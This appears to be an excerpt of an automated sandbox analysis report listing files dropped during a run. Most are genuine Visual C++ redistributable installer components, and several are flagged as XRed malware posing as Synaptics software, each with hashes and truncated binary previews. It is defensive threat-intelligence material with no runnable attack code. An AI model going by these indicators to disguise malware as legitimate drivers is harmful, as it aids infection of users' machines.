Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

C:\ProgramData\Package Cache\.unverified\cab54A5CABBE7274D8A22EB58060AAB7623 (copy)

Download File

Process:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
File Type:	Microsoft Cabinet archive data, many, 1350653 bytes, 50 files, at 0x44 +A "api_ms_win_core_console_l1_1_0.dll" +A "api_ms_win_core_datetime_l1_1_0.dll", flags 0x4, number 1, extra bytes 20 in head, 111 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	1367669
Entropy (8bit):	7.997832401624505
Encrypted:	true
SSDEEP:	24576:OawWVgz9615LBBl9NWA5852M/fzoapq0m9Oz03FOae6p4Cjd81kD0+0CCxco2iJs:OawWV+96vVBNWOMU0qhOz035e6ppNCst
MD5:	29C34C40D349C145E297B6977908E687
SHA1:	025B5CF7D6515CC6151628063752C159F41D99C7
SHA-256:	61AACFF6365DA15F2C9D0FF1C8FB2EC207D145CD9104AFA0CE663BF1542DB245
SHA-512:	BBD9F65C2619DE25F99A8BA21346D7EA46DB9EBA79FEB6039E0E86999D1EA2C9A4564FA727DDA442A69C169DBDC8A4913DF925C42B3AD7F4030A655AC01C0691
Malicious:	false
Preview:	MSCF............D...........2...................xB..........~...o....O........(P.. .api_ms_win_core_console_l1_1_0.dll..M...O....(P.. .api_ms_win_core_datetime_l1_1_0.dll..N........(P.. .api_ms_win_core_debug_l1_1_0.dll. M........(P.. .api_ms_win_core_errorhandling_l1_1_0.dll. [...9....(P.. .api_ms_win_core_file_l1_1_0.dll. M..0.....(P.. .api_ms_win_core_file_l1_2_0.dll. M..P.....(P.. .api_ms_win_core_file_l2_1_0.dll. M..p.....(P.. .api_ms_win_core_handle_l1_1_0.dll..O...{....(P.. .api_ms_win_core_heap_l1_1_0.dll..O........(P.. .api_ms_win_core_interlocked_l1_1_0.dll..O..p.....(P.. .api_ms_win_core_libraryloader_l1_1_0.dll..W..`k....(P.. .api_ms_win_core_localization_l1_2_0.dll..O..P.....(P.. .api_ms_win_core_memory_l1_1_0.dll. M..@.....(P.. .api_ms_win_core_namedpipe_l1_1_0.dll..Q..``....(P.. .api_ms_win_core_processenvironment_l1_1_0.dll..U..P.....(P.. .api_ms_win_core_processthreads_l1_1_0.dll..O..@.....(P.. .api_ms_win_core_processthreads_l1_1_1.dll..K..0X....(P.. .api_ms_win_core_

C:\ProgramData\Package Cache\.unverified\cabB3E1576D1FEFBB979E13B1A5379E0B16 (copy)

Download File

Process:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
File Type:	Microsoft Cabinet archive data, many, 5194062 bytes, 14 files, at 0x44 +A "mfc140.dll" +A "mfc140chs.dll", flags 0x4, number 1, extra bytes 20 in head, 326 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	5211054
Entropy (8bit):	7.998080908238165
Encrypted:	true
SSDEEP:	98304:dEpMtGvCYmfjBvRxMh7vhetajX6x0XSvrTBEbwwF0XVsvufq:dElCPLBvE8xuEebw6vuy
MD5:	4FEADE30692872EAB413C1123A5F3DE4
SHA1:	B08C319BD7E01176F02D0DC3B4AA8B7C5B9A82C6
SHA-256:	2805E5CC8E477AC1D6847B3CF083A85EC463F646037B59C93CB9E3096A78B81A
SHA-512:	145956C65E193AD5309CA3C0F0BC94DFB20C6BCF73494BDE2ABC48F6495061EE727C9FAA1B97739FE3028873A540A5F17FDFFEB08D8C3A35C2CD7B3DDB088E54
Malicious:	false
Preview:	MSCF....NAO.....D...........................NAO.`B..............F... .H.......(P.. .mfc140.dll.... .H...(P.. .mfc140chs.dll. .....I...(P.. .mfc140cht.dll..)..(nJ...(P.. .mfc140deu.dll. .....K...(P.. .mfc140enu.dll. %..8.L...(P.. .mfc140esn.dll..)..X.M...(P.. .mfc140fra.dll..!..H.N...(P.. .mfc140ita.dll.....8.P...(P.. .mfc140jpn.dll.....(.P...(P.. .mfc140kor.dll.......Q...(P.. .mfc140rus.dll. .M...R...(P.. .mfc140u.dll. C..(e....(P.. .mfcm140.dll. C..H.....(P.. .mfcm140u.dll..J.%.4..CK..w....0...Q6Q..}.......[.nl....;. ...L.....H%.K.w}.<.u..y.y.....g........M6....E..}.m.=...?....?.$Q4...O..;..<8....^{........].Ov....<$.u.d..${...........i..z......s,p.....?...8..F......].~=c.{.].~=m.C.?~..A..6....O....~.h...\..v...s.l..z..'..q..=\|..l...........h.I&...j.N..Y..;.I..-*'D.....;/.Eq.....(...../SG..u..t..eO\|o.p..F.../......{t....E..g/..$.s./..v.........l.Vt.y...L....xW.e&._.i.d..Q4.c......?.=.8$...9..]..N....X>a.]..%...._g.Ng...w.5..........V........v71.~2.

C:\ProgramData\Package Cache\.unverified\vcRuntimeAdditional_x86 (copy)

Download File

Process:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2019 X86 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508., Template: Intel;1033, Revision Number: {AD7DFCA8-EC53-476F-8C40-02D89ABDEA49}, Create Time/Date: Wed Jan 8 09:31:14 2020, Last Saved Time/Date: Wed Jan 8 09:31:14 2020, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
Category:	dropped
Size (bytes):	184320
Entropy (8bit):	6.3376915344280516
Encrypted:	false
SSDEEP:	3072:JviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdN:JvipBaTDo1j//SZhN
MD5:	4B97853A7D10743D67665CCDD67E8566
SHA1:	AF5F7059C9A05A388B4773917E17A078FA58F5E9
SHA-256:	63802C8D96CF21A8EADB1EC5B0B52A9A040581AB2797FE5132E1B3A469108713
SHA-512:	ED88564A372FBA36FB7F2D98476C82D1D66B17B25AB9B6C34489D33BB7F1D64ABBD2E746E75470E05DECA09252D9B855AB0F37F6F82210AF3F006C9A683C7370
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Package Cache\.unverified\vcRuntimeMinimum_x86 (copy)

Download File

Process:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2019 X86 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508., Template: Intel;1033, Revision Number: {DC639984-8B88-4DB7-A65E-0E5CCB21EAB1}, Create Time/Date: Wed Jan 8 09:28:18 2020, Last Saved Time/Date: Wed Jan 8 09:28:18 2020, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
Category:	dropped
Size (bytes):	192512
Entropy (8bit):	6.237627585353464
Encrypted:	false
SSDEEP:	3072:VGviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdNt:8vipBaTDo1j//SZhN
MD5:	6AA3A12A374E36C6A7BD75B7627A5A7C
SHA1:	56DD5F67FE9FB9C9B70470F535FC2DD6C2DECF38
SHA-256:	AA5B428789D83FBCD60442EE253B364C5FC833C698C1DC1EB73F5559A63FB976
SHA-512:	B3A4497E3629A4ED8DB8C7D83C5D8CF2270D7DCE320CA4D5009EDB0F6CBC3F3759A2F753ED0C673EFAF521AA175E2E6D53FC609F351B8A0AA00D74BC4F179720
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Package Cache\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\packages\vcRuntimeAdditional_x86\cab1.cab (copy)

Download File

Process:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
File Type:	Microsoft Cabinet archive data, many, 5194062 bytes, 14 files, at 0x44 +A "mfc140.dll" +A "mfc140chs.dll", flags 0x4, number 1, extra bytes 20 in head, 326 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	5211054
Entropy (8bit):	7.998080908238165
Encrypted:	true
SSDEEP:	98304:dEpMtGvCYmfjBvRxMh7vhetajX6x0XSvrTBEbwwF0XVsvufq:dElCPLBvE8xuEebw6vuy
MD5:	4FEADE30692872EAB413C1123A5F3DE4
SHA1:	B08C319BD7E01176F02D0DC3B4AA8B7C5B9A82C6
SHA-256:	2805E5CC8E477AC1D6847B3CF083A85EC463F646037B59C93CB9E3096A78B81A
SHA-512:	145956C65E193AD5309CA3C0F0BC94DFB20C6BCF73494BDE2ABC48F6495061EE727C9FAA1B97739FE3028873A540A5F17FDFFEB08D8C3A35C2CD7B3DDB088E54
Malicious:	false
Preview:	MSCF....NAO.....D...........................NAO.`B..............F... .H.......(P.. .mfc140.dll.... .H...(P.. .mfc140chs.dll. .....I...(P.. .mfc140cht.dll..)..(nJ...(P.. .mfc140deu.dll. .....K...(P.. .mfc140enu.dll. %..8.L...(P.. .mfc140esn.dll..)..X.M...(P.. .mfc140fra.dll..!..H.N...(P.. .mfc140ita.dll.....8.P...(P.. .mfc140jpn.dll.....(.P...(P.. .mfc140kor.dll.......Q...(P.. .mfc140rus.dll. .M...R...(P.. .mfc140u.dll. C..(e....(P.. .mfcm140.dll. C..H.....(P.. .mfcm140u.dll..J.%.4..CK..w....0...Q6Q..}.......[.nl....;. ...L.....H%.K.w}.<.u..y.y.....g........M6....E..}.m.=...?....?.$Q4...O..;..<8....^{........].Ov....<$.u.d..${...........i..z......s,p.....?...8..F......].~=c.{.].~=m.C.?~..A..6....O....~.h...\..v...s.l..z..'..q..=\|..l...........h.I&...j.N..Y..;.I..-*'D.....;/.Eq.....(...../SG..u..t..eO\|o.p..F.../......{t....E..g/..$.s./..v.........l.Vt.y...L....xW.e&._.i.d..Q4.c......?.=.8$...9..]..N....X>a.]..%...._g.Ng...w.5..........V........v71.~2.

C:\ProgramData\Package Cache\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi (copy)

Download File

Process:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2019 X86 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508., Template: Intel;1033, Revision Number: {AD7DFCA8-EC53-476F-8C40-02D89ABDEA49}, Create Time/Date: Wed Jan 8 09:31:14 2020, Last Saved Time/Date: Wed Jan 8 09:31:14 2020, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
Category:	dropped
Size (bytes):	184320
Entropy (8bit):	6.3376915344280516
Encrypted:	false
SSDEEP:	3072:JviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdN:JvipBaTDo1j//SZhN
MD5:	4B97853A7D10743D67665CCDD67E8566
SHA1:	AF5F7059C9A05A388B4773917E17A078FA58F5E9
SHA-256:	63802C8D96CF21A8EADB1EC5B0B52A9A040581AB2797FE5132E1B3A469108713
SHA-512:	ED88564A372FBA36FB7F2D98476C82D1D66B17B25AB9B6C34489D33BB7F1D64ABBD2E746E75470E05DECA09252D9B855AB0F37F6F82210AF3F006C9A683C7370
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Package Cache\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\packages\vcRuntimeMinimum_x86\cab1.cab (copy)

Download File

Process:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
File Type:	Microsoft Cabinet archive data, many, 1350653 bytes, 50 files, at 0x44 +A "api_ms_win_core_console_l1_1_0.dll" +A "api_ms_win_core_datetime_l1_1_0.dll", flags 0x4, number 1, extra bytes 20 in head, 111 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	1367669
Entropy (8bit):	7.997832401624505
Encrypted:	true
SSDEEP:	24576:OawWVgz9615LBBl9NWA5852M/fzoapq0m9Oz03FOae6p4Cjd81kD0+0CCxco2iJs:OawWV+96vVBNWOMU0qhOz035e6ppNCst
MD5:	29C34C40D349C145E297B6977908E687
SHA1:	025B5CF7D6515CC6151628063752C159F41D99C7
SHA-256:	61AACFF6365DA15F2C9D0FF1C8FB2EC207D145CD9104AFA0CE663BF1542DB245
SHA-512:	BBD9F65C2619DE25F99A8BA21346D7EA46DB9EBA79FEB6039E0E86999D1EA2C9A4564FA727DDA442A69C169DBDC8A4913DF925C42B3AD7F4030A655AC01C0691
Malicious:	false
Preview:	MSCF............D...........2...................xB..........~...o....O........(P.. .api_ms_win_core_console_l1_1_0.dll..M...O....(P.. .api_ms_win_core_datetime_l1_1_0.dll..N........(P.. .api_ms_win_core_debug_l1_1_0.dll. M........(P.. .api_ms_win_core_errorhandling_l1_1_0.dll. [...9....(P.. .api_ms_win_core_file_l1_1_0.dll. M..0.....(P.. .api_ms_win_core_file_l1_2_0.dll. M..P.....(P.. .api_ms_win_core_file_l2_1_0.dll. M..p.....(P.. .api_ms_win_core_handle_l1_1_0.dll..O...{....(P.. .api_ms_win_core_heap_l1_1_0.dll..O........(P.. .api_ms_win_core_interlocked_l1_1_0.dll..O..p.....(P.. .api_ms_win_core_libraryloader_l1_1_0.dll..W..`k....(P.. .api_ms_win_core_localization_l1_2_0.dll..O..P.....(P.. .api_ms_win_core_memory_l1_1_0.dll. M..@.....(P.. .api_ms_win_core_namedpipe_l1_1_0.dll..Q..``....(P.. .api_ms_win_core_processenvironment_l1_1_0.dll..U..P.....(P.. .api_ms_win_core_processthreads_l1_1_0.dll..O..@.....(P.. .api_ms_win_core_processthreads_l1_1_1.dll..K..0X....(P.. .api_ms_win_core_

C:\ProgramData\Package Cache\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi (copy)

Download File

Process:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2019 X86 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508., Template: Intel;1033, Revision Number: {DC639984-8B88-4DB7-A65E-0E5CCB21EAB1}, Create Time/Date: Wed Jan 8 09:28:18 2020, Last Saved Time/Date: Wed Jan 8 09:28:18 2020, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
Category:	dropped
Size (bytes):	192512
Entropy (8bit):	6.237627585353464
Encrypted:	false
SSDEEP:	3072:VGviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdNt:8vipBaTDo1j//SZhN
MD5:	6AA3A12A374E36C6A7BD75B7627A5A7C
SHA1:	56DD5F67FE9FB9C9B70470F535FC2DD6C2DECF38
SHA-256:	AA5B428789D83FBCD60442EE253B364C5FC833C698C1DC1EB73F5559A63FB976
SHA-512:	B3A4497E3629A4ED8DB8C7D83C5D8CF2270D7DCE320CA4D5009EDB0F6CBC3F3759A2F753ED0C673EFAF521AA175E2E6D53FC609F351B8A0AA00D74BC4F179720
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe

Download File

Process:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	647912
Entropy (8bit):	7.215948724836638
Encrypted:	false
SSDEEP:	12288:snMwHskY7gjcjhVIEhqgM7bWvcsi6aVhPIyP3WRCzJ9ztLz5/YTDd:6MysZgjS1hqgSC/izxf+czJZhz5Qnd
MD5:	2F9D2B6CE54F9095695B53D1AA217C7B
SHA1:	3F54934C240F1955301811D2C399728A3E6D1272
SHA-256:	0009D3F27837C3AF3F6FFF7973FAF07AFAA4B53119846F55B6F2A79F1759C757
SHA-512:	692857F960F26039C7B0AF6329E65A71E8588FF71EAAC6B956BD6E437994A8D5A470C7E75DD776E0772E473967B64D5EA0E1D8396546691316DAF4D6B8CCC237
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p............@..............................................;...............$...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\state.rsm

Download File

Process:	C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe
File Type:	data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	2.51382832612064
Encrypted:	false
SSDEEP:	12:oZK34pgMClGttDa+xU9m4RIb7ttun2QzBXcKYGun2Q9h:aKUgMClccDR8l
MD5:	955B1A5CA0B61E72295CCED07BB0124C
SHA1:	9E1BA1116AA8315EC9407D45F51D544B751E4E1C
SHA-256:	0D2CAD561DD8FF7C96D5DD5F05FCFCE843107D40766E4EDF3DFBD7A06160195B
SHA-512:	58CF368C35D4286CA18B6D51C684A3FFC3748C3DED487AD160350E1F63C711120CBEBE8E9983ACD9F3EE32A8333CFC875901014FC1E44F2F30161864ED7D78B8
Malicious:	false
Preview:	K...................................................................................................................................................................................................................................................W.i.x.B.u.n.d.l.e.F.o.r.c.e.d.R.e.s.t.a.r.t.P.a.c.k.a.g.e.....................W.i.x.B.u.n.d.l.e.L.a.s.t.U.s.e.d.S.o.u.r.c.e.................................W.i.x.B.u.n.d.l.e.N.a.m.e.....B...M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.1.9. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.8.6.). .-. .1.4...2.5...2.8.5.0.8.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.....*...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.D.e.s.k.t.o.p.\..._.c.a.c.h.e._.f.i.l.e...e.x.e.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.F.o.l.d.e.r.........C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.D.e.s.k.t.o.p.\.................................

C:\ProgramData\Synaptics\RCXD314.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	771584
Entropy (8bit):	6.636362882247521
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IFr:ansJ39LyjbJkQFMhmC+6GD92
MD5:	B753207B14C635F29B2ABF64F603570A
SHA1:	8A40E828224F22361B09494A556A20DB82FC97B9
SHA-256:	7F16106F3354A65FC749737905B77DF7BBEFA28BF8BBC966DC1F8C53FA4660F2
SHA-512:	0DD32803B95D53BADD33C0C84DF1002451090FF5F74736680E3A53A0BFC0E723EEE7D795626BC10A1FB431DE7E6E276C5A66349EF385A8B92B48425B0BDD036F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXD314.tmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXD314.tmp, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15183872
Entropy (8bit):	7.9774907952358145
Encrypted:	false
SSDEEP:	393216:o0d/FlptVYmfr7yBG/4JU4TRjtjUMy4i6kgsY7A:H1PpttD7yBG/QHTJtYMyke3
MD5:	7274B0B15C4E6D5BBE8DB5AA93C65A12
SHA1:	643418B70EE7242FB4CF797E54EC78C910D32824
SHA-256:	70C87AF178A804F97A312D3D8D509D5C6F4A54AC07D08BACF858E6687DE7E435
SHA-512:	241CA5EAA520A22A1C264F2FD3307C95D78FB56C2433602E42DCF9F2EB419ED2D43D40F6524A61A1D6E696375F7EA722FD502FA939D4453D88CA63AC068BE224
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..........................................@..............................................@..............................B......@....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...@...........................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\LXIDmDY.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.262510353691065
Encrypted:	false
SSDEEP:	24:GgsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
MD5:	E13E9A9E27443DBF8F6E4C09E1DD5674
SHA1:	BECE76416223954A0F30C95B81AB8DEC385439B7
SHA-256:	5A50E4B54537E49B91A6DB585B1B30C6780728C28E2C160D6665E659EAE58453
SHA-512:	3BABA4F0E9212610CA35DDF95AAC4EB8A738946BEC59978EDC8DA9343A0F403850B576E43BF4E5057B0A5BFE64A6C4EA0E6748AF5B63536D35EBDD01E32BF87D
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EuGsuvMYscVijn3fuBR9Qg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20250102144137.log

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	ASCII text, with very long lines (321), with CRLF line terminators
Category:	dropped
Size (bytes):	13739
Entropy (8bit):	5.49736521403155
Encrypted:	false
SSDEEP:	192:7X3snG1e1s1z1D1A1u191FphdgwWQUOi22oXUqyG854H4u:7XEmphdg7sXUqH
MD5:	4C11D753957C93DC032EC633DB9DFBC3
SHA1:	B5BDCA15C8F48C4DA748A2FA3592BCD1B2F6E859
SHA-256:	E58118270A882FF94CA0E9D9C5EAAB6E48C6A2344A42541BA440662C9001AA02
SHA-512:	616F244059C1B9195D78602CB8A9C37738CFF255B4729F7601FB00F56F6A17FD3AFAB0BFBCD7D3FB60CF670FC0D31870301DFC8D387E2279FBBBAE1BAF8A446D
Malicious:	false
Preview:	[1498:0F0C][2025-01-02T14:41:36]i001: Burn v3.10.4.4718, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe..[1498:0F0C][2025-01-02T14:41:36]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\._cache_file.exe -burn.filehandle.attached=644 -burn.filehandle.self=652'..[1498:0F0C][2025-01-02T14:41:36]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\._cache_file.exe'..[1498:0F0C][2025-01-02T14:41:36]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1498:0F0C][2025-01-02T14:41:37]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20250102144137.log'..[1498:0F0C][2025-01-02T14:41:37]i000: Setting string variable 'WixBundleName' to value 'Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508'..[1498:0F0C][2025-01-02T14:41:37]i000: Setting stri

C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20250102144137_000_vcRuntimeMinimum_x86.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
Category:	dropped
Size (bytes):	134914
Entropy (8bit):	3.813415396845907
Encrypted:	false
SSDEEP:	1536:ZZ/ZPTwomPTtlc7HDolM2L9G5xliYAgmGhkoDjlAkjjOZZZZZZZaDlGMOdI:ZIWjjOZZZZZZZaDlGMOe
MD5:	52853EE64E5321CF1EEBEC1A1FEAE77B
SHA1:	CB954745DCBB9DE9EEE1B822EC5959A80031FE53
SHA-256:	CA99A555A61BE3B1EA4470ECBC7815FEF0450C09997A742B2CEA89925BA922B1
SHA-512:	4795439456A9806E69C333683F28BE50E4CF737423FCBFDA38AD1CB9696C913C661828A7687079A1D8389D92CB473732F942571741FA9CC31519553C650E00CC
Malicious:	false
